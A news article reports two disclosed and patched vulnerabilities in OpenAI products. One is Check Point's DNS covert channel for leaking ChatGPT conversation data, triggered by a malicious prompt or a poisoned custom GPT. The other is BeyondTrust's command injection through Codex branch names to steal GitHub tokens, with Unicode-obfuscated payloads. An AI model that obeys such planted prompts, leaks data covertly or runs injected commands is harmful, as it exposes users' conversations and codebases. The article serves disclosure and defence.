Security analysts from Check Point have identified a significant vulnerability in ChatGPT that allowed unauthorized access to user conversations, without their knowledge or consent. OpenAI successfully resolved this issue by the end of February 2026, and there have been no reports of this vulnerability being exploited in real-world attacks. The flaw was traced to the Linux runtime environment utilized by the AI agent for data analysis and code execution. Researchers found a covert communication channel via DNS, which encoded sensitive information directly into DNS queries, effectively bypassing existing security measures. Alarmingly, this channel theoretically enabled remote access to the Linux shell, allowing for arbitrary command execution. Analysts noted that the model operated under the assumption that its execution environment was isolated and incapable of external data transmission, which meant that the data leak went unnoticed and did not trigger any alerts or require user confirmation. An attack scenario could involve a malicious actor convincing a victim to copy a harmful prompt into the chat, masked as a method to "unlock premium features" or "enhance ChatGPT's performance." Even more concerning was the potential risk posed by custom GPTs, which could be preloaded with malicious logic, eliminating the need for user interaction altogether. Eli Smadja, head of Check Point Research, emphasized that this study highlights a troubling reality in the AI era: one should not assume that AI tools are inherently secure. Concurrently, experts from BeyondTrust Phantom Labs disclosed a critical vulnerability in OpenAI Codex related to command injection in the cloud-based AI development agent. This flaw could lead to the theft of GitHub authentication tokens, compromising all users involved with a shared repository. The issue stemmed from insufficient input validation, as Codex failed to properly check GitHub branch names during task execution, allowing attackers to inject commands directly through API POST requests. Consequently, malicious payloads could execute within the agent’s container, granting attackers access to authentication tokens. BeyondTrust warned that this vulnerability enabled lateral movement and complete access to the victim's codebase, both for reading and writing. To enhance stealth, the researchers created obfuscated payloads using Unicode characters, making harmful commands invisible through the interface. The vulnerability affected the ChatGPT site, Codex CLI, Codex SDK, and the Codex extension for IDEs. BeyondTrust reported the issue to OpenAI on December 16, 2025, and the company patched the vulnerability by February 5, 2026. This incident underscores the critical need for ongoing vigilance in AI security, as competitors may now increase their focus on strengthening their own systems against similar threats.
Informational material. 18+.